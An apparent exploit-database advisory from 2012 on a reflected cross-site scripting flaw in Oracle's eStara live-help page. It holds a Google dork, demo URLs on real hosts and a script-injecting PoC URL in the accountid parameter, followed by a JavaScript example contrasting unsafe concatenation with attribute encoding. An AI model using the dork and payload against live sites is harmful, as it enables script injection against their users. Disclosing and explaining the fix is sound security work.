# Exploit Title: Oracle Live Help On Demand Webcare Cross Site Scripting
# Date: 29.02.2012
# Author: Sony
# Software Link: http://www.oracle.com/index.html
# Google Dorks: inurl:UI/gui.php
# Web Browser: Mozilla Firefox
# Blog: http://st2tea.blogspot.com
# PoC: http://st2tea.blogspot.com/2012/02/oracle-live-help-on-demand-webcare.html
..................................................................

Demo:

http://as00.estara.com/UI/gui.php?accountid=200106284055 [our XSS is here]

http://as00.estara.com/UI/gui.php?accountid=200106284055&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217&timestamp=1234150034

or

https://t-603.estara.com/UI/gui.php?accountid=200106300249&template=823514&calltype=webvoicepop&linkfile=%2FOneCC%2F200106300249%2F823514.js&referrer=Email&donotcache=1444509745&emaillink=1&guiid=43834a54eac25&timestamp=1321973587

PoC (reflected XSS: the accountid value is echoed into the page unescaped, so a value that closes the surrounding attribute and opens a script tag executes):

http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E&template=314323&calltype=webvoicepop&linkfile=%2FOneCC%2F200106284055%2F314323.js&referrer=Email&donotcache=1101055368&emaillink=1&guiid=440d09ef58217&timestamp=1234150034

Screenshot: http://2.bp.blogspot.com/-pGRIzWM5Ll0/T03bHKCWwmI/AAAAAAAAAo8/oaLXxGtydnc/s1600/oracle.JPG
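Added example (not from the advisory, not Oracle's or the author's code): it decodes the accountid value out of the PoC URL above, shows how straight concatenation of that value into a quoted HTML attribute lets the payload break out and inject script, and shows the attribute-context HTML encoding that would have neutralised the same input. The `renderUnsafe` template is an assumption about how gui.php reflects the parameter; the advisory does not show the server-side code.

```javascript
// PoC URL from the advisory (query truncated to the parameters that matter).
const POC_URL =
  "http://as00.estara.com/UI/gui.php?accountid=200106284055%22%22%3E%3Cscript%3Ealert%28%22..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Sony:Salut!%22%29%3C/script%3E&template=314323&calltype=webvoicepop";

// Pull the accountid parameter out of the URL, percent-decoded as the server would see it.
function extractAccountId(url) {
  return new URL(url).searchParams.get("accountid");
}

// ASSUMED vulnerable rendering: the raw value is concatenated into a quoted attribute.
// A value containing `"><script>...` closes the attribute and the tag, then injects markup.
function renderUnsafe(accountId) {
  return `<input type="hidden" name="accountid" value="${accountId}">`;
}

// Attribute-context HTML encoding: every character that can end an attribute or
// start a tag/entity is replaced with its entity, so the value stays inert text.
function escapeHtmlAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same template, encoded value.
function renderSafe(accountId) {
  return `<input type="hidden" name="accountid" value="${escapeHtmlAttr(accountId)}">`;
}

// Crude detector used only to compare the two renderings: is there a live <script start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone run: print both renderings for the PoC value.
if (typeof require !== "undefined" && require.main === module) {
  const id = extractAccountId(POC_URL);
  console.log("decoded accountid:", id);
  console.log("unsafe:", renderUnsafe(id));
  console.log("safe:  ", renderSafe(id));
}
```

Encoding is the fix for the reflection; restricting accountid to the digits it is evidently meant to contain (e.g. `/^\d+$/`) is the cheaper check that would reject this payload outright before it ever reaches a template.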